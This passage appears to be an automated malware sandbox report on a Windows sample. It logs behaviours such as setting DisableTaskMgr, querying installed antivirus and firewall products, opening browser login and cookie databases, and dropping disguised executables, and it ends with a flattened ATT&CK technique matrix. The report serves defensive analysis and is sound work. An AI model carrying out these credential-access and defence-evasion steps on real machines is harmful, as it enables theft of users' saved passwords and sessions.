                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files\Everything\Everything.exeQueries volume information: C:\Program Files\Everything\Everything.exe VolumeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeQueries volume information: C:\Windows\apppatch\CustomSDB\sihost.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeQueries volume information: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe VolumeInformation
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeQueries volume information: C:\Windows\apppatch\CustomSDB\sihost.exe VolumeInformation
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,2_2_00CDDF1E
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D546D80 GetUserNameW,6_2_00007FF63D546D80
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCB146 GetVersionExW,2_2_00CCB146
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1
                                Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: containerwebruntime.exe PID: 2300, type: MEMORYSTR
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.containerwebruntime.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.4d9171e.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.1468d6b8.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000000.2267598724.0000000000122000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\apppatch\CustomSDB\sihost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\sqls211.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, type: DROPPED
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.containerwebruntime.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.4d9171e.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.1468d6b8.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\apppatch\CustomSDB\sihost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\sqls211.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, type: DROPPED
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: containerwebruntime.exe PID: 2300, type: MEMORYSTR
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.containerwebruntime.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.4d9171e.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.1468d6b8.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000000.2267598724.0000000000122000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\apppatch\CustomSDB\sihost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\sqls211.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, type: DROPPED
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.containerwebruntime.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.4d9171e.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.3.sqls211.exe.650f71e.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wxl1r0lntg.exe.1468d6b8.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\apppatch\CustomSDB\sihost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\sqls211.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                1
                                Replication Through Removable Media
                                141
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                31
                                Disable or Modify Tools
                                1
                                OS Credential Dumping
                                1
                                System Time Discovery
                                1
                                Taint Shared Content
                                11
                                Archive Collected Data
                                1
                                Encrypted Channel
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts2
                                Native API
                                1
                                DLL Side-Loading
                                1
                                Access Token Manipulation
                                11
                                Deobfuscate/Decode Files or Information
                                11
                                Input Capture
                                21
                                Peripheral Device Discovery
                                Remote Desktop Protocol1
                                Data from Local System
                                2
                                Non-Application Layer Protocol
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                15
                                Windows Service
                                15
                                Windows Service
                                141
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares11
                                Input Capture
                                12
                                Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts13
                                Command and Scripting Interpreter
                                311
                                Registry Run Keys / Startup Folder
                                11
                                Process Injection
                                13
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object Model2
                                Clipboard Data
                                Protocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts12
                                Service Execution
                                Network Logon Script311
                                Registry Run Keys / Startup Folder
                                1
                                DLL Side-Loading
                                LSA Secrets168
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion
                                Cached Domain Credentials371
                                Security Software Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                                Masquerading
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Modify Registry
                                Proc Filesystem261
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow1
                                Application Window Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Access Token Manipulation
                                Network Sniffing1
                                System Owner/User Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                                Process Injection
